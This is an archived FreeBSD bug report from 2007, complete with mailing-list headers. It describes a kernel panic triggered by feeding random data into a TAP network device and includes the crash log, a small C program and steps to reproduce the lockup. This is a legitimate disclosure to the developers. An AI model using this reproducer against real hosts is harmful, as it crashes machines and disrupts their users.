From owner-freebsd-bugs@FreeBSD.ORG Mon Dec 3 15:10:04 2007 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id A08F616A421 for ; Mon, 3 Dec 2007 15:10:04 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 83E3C13C45A for ; Mon, 3 Dec 2007 15:10:04 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.2/8.14.2) with ESMTP id lB3FA4Vd071117 for ; Mon, 3 Dec 2007 15:10:04 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.2/8.14.1/Submit) id lB3FA4Tg071116; Mon, 3 Dec 2007 15:10:04 GMT (envelope-from gnats) Resent-Date: Mon, 3 Dec 2007 15:10:04 GMT Resent-Message-Id: <200712031510.lB3FA4Tg071116@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Gabor Berczi Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 95CBF16A417 for ; Mon, 3 Dec 2007 15:08:32 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 874D413C4D3 for ; Mon, 3 Dec 2007 15:08:32 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.2/8.14.2) with ESMTP id lB3F8DsX080760 for ; Mon, 3 Dec 2007 15:08:13 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.2/8.14.1/Submit) id lB3F8DVQ080758; Mon, 3 Dec 2007 15:08:13 GMT (envelope-from nobody) Message-Id: <200712031508.lB3F8DVQ080758@www.freebsd.org> Date: Mon, 3 Dec 2007 15:08:13 GMT From: Gabor Berczi To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: misc/118399: local/remote kernel DoS through TAP device X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 03 Dec 2007 15:10:04 -0000 >Number: 118399 >Category: misc >Synopsis: local/remote kernel DoS through TAP device >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 03 15:10:04 UTC 2007 >Closed-Date: >Last-Modified: >Originator: Gabor Berczi >Release: 6.2-RELEASE >Organization: >Environment: Tested on x86/alpha, SMP/non-SMP. >Description: There is a bug somewhere in the FreeBSD kernel that causes lockup if the TAP device receives abnormal data. .. tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 39e7 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 4fe7 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 44b4 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 87df flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 1c flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 1f flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 80c0 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 9a87 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type c5e6 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 2aab flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 656c flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type e6f3 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 48bd flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type ca87 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type d0ca flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 249c flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514) fatal kernel trap: trap entry = 0x2 (memory management fault) cpuid = 0 faulting va = 0x34 type = access violation cause = load instructon pc = 0xfffffc00005dd39c ra = 0xfffffc00005de15c sp = 0xfffffe0007763870 usp = 0x11ffd6c0 curthread = 0xfffffc0001ef22b0 pid = 31183, comm = zsh panic: trap >How-To-Repeat: 1. Compile this: #include #include #include #include #include int main(int argc, char **argv) { if (argc != 2) return 1; int fd = open(argv[1], O_WRONLY); if (fd < 0) { perror("open"); return 1; } for (;;) { char buf[2048]; int ret = read(0, buf, sizeof(buf)); if (ret < 0) { perror("read"); close(fd); return 1; } ret = write(fd, buf, ret); } return 0; } 2. Load if_tap, and create tap0 device. 3. cat /dev/urandom|./a.out /dev/tap0 Sooner or later it'll die. >Fix: >Release-Note: >Audit-Trail: >Unformatted: